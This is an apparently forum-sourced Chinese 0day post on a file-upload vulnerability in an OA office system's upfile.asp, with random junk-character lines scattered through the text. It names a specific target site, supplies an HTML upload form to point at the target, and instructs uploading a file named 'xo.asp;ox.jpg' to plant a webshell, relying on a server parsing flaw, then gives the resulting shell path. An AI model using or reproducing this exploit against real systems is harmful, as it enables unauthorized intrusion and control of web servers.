全能OA办公系统0day OA办公系统漏洞 上传漏洞

admin

全能OA办公系统 上传漏洞
​
8 h1 j  t/ B- v: S6 g) G4 \系统介绍：
% [2 Y- D, e1 T. _$ q' k* Q
全能OA办公系统2012是功能非常强大的OA系统，目前功能已完全能满足日常办公需要。
& n" j: K2 d6 ~" e& P) }% [$ N
主要功能：
( U$ x$ _' w' h4 b5 x, j0 X公司通告
工作计划
通讯助理
0 i! F' {- |7 a4 A' f客户资源
! ?5 V' S9 f4 n, `8 _" Q我的公文
公文传阅
6 u* S' C: X0 j! B) R0 j% \9 Q公共资源
/ ^) S2 P& E0 t* U: I: X1 D资源预约
7 `* e: R* e/ [6 I$ n今日考勤
个人计划
个人通讯录
个人基本档案
# o+ }) @1 a2 f" h, D) m8 V! A+ T未读邮件
" W- b. z2 t$ X9 N, f发邮件
" A0 w: U( G3 a9 z, N/ s收件夹
寄件夹
网络硬盘
, }5 `8 N4 i1 @( o. b" ]网络会议
4 j8 P7 J( o& M/ P$ `/ [网络调查
交流论坛
9 D# ~+ l: u$ y
有兴趣测试的朋友可以下源码看看
5 _8 R  Q  ^6 V) w
/ o! t4 v: P7 p  B/ N4 j源码下载：

' O# w* K& m: @% Q# Phttp://www.mycodes.net/30/4750.htm
, `$ `6 {6 F2 U4 M
% y) P. X3 \! V' s漏洞介绍：
- d3 H1 e, Z; F) r6 v2 Z8 e: X; O
  n% i% _9 I% Z- n) K% T由upfile.asp上传文件漏洞引起
; o* Q1 y9 ~# t5 G' O, Q
6 K* f# b# B! G) ?测试方法：

使用名小子上传http://www.itlynn.com/upfile.asp即可
! Z( [9 r2 A% o2 y  v4 H* C
+ g: e& V4 a0 ^) k# Z" q如果upfile.asp文件被删除不存在。
& J# e' [+ Q7 Q$ X( O" \
  b/ J& ]9 a( m# g* B  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。

. F/ ~2 i( u( x如果存在那么将如下代码保存为upfile.html。

然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。


7 V  g' H# T) G3 U% L+ t$ Z' q' T
2 ]  S/ g7 U4 k& ]3 @5 L( z01 <table border='0' align="center" cellpadding="5">

02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
, s. v% R2 ^7 i3 P$ C- C. T- u
# `9 Q$ O9 C8 k" ~4 i4 b1 W2 E% I3 i03 <tr>
; ?1 Y9 X9 N& b' v
6 k  {8 p* w; e7 M  n5 U04             <td>报错：</td>
- m' v1 @0 K: I7 l2 {  L& V; z& n/ r
) L3 U# _( ]/ E- a! E+ M! }05             <td><input type='radio' name='errnumber' value='0'>
0 }! Y. |8 _& E7 _: [
6 F. g- X( x% T; D9 S06               自动更名
2 U$ @4 U2 B; S0 H6 a4 n, {. _  b$ J
  T; }4 l4 _4 R07               <input type='radio' name='errnumber' value='1' checked>

; K# G' n$ q3 M8 w& U08               报错方式
4 k$ }% H# h3 U7 g. c  c2 M
, x& G, o: w& }0 z0 V. v. t09               <input type='radio' name='errnumber' value='2'>
( p0 q( P' K# u. n, Q" R) W: V3 C
: P  U$ n5 Y$ ^4 Q5 L6 U3 K) X10               直接覆盖</td>
- X5 O1 {6 T2 N' U: a6 f; F9 l
11           </tr>
* H+ v, r8 ~6 m- W2 r. h
12           <tr>
4 I& {9 ]1 K  @# d) Y
( z* V) c( j6 f# Z* T13             <td>主题：</td>
1 r# n! s' a4 ~' b
8 ^  Q4 Y/ M; |' O% h2 A14             <td><input type='text' name='filename' size='30'></td>

. H) ]1 n0 s- J' @8 Z" X7 m15           </tr>
; Q) d- b) E2 _. A7 G! o' L8 `0 o
16           <tr>
8 `* _* O6 G& q- X) ]
17             <td>文件：</td>
8 B+ N1 B) @- G5 v; K
18             <td><input type="file"name="fruit"size="30"></td>
" |% R- D/ z. a/ G
2 o% A+ V) }( q7 K& {( s$ P- d0 q19           </tr>

1 i4 \3 z1 p7 t1 e9 ~) X) z0 s; A20           <tr>

21             <td valign='top'>简介：</td>
. X. s, |( y2 a8 j. L
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>

2 c$ t/ T: k8 |23           </tr>
* m4 h0 N7 e$ P0 X0 L; }
6 C* l8 ~: F$ u0 `24   

25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
8 ^  }5 E! @) N
; \( S. i; J. F+ J% @26           </tr>
/ E# B3 ]  p. f7 T- }6 N6 y
27         </form>

然后打开上传一个文件名为xo.asp;ox.jpg的文件。
. D, G& N, V& n, {7 l# d
5 W1 L& k" W" e
. t/ h+ _6 m- [2 q/ g
上传成功后，马的路径是：http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg

此漏洞需要配合解析漏洞利用。

! q4 F8 I5 `' k: o+ l2 ^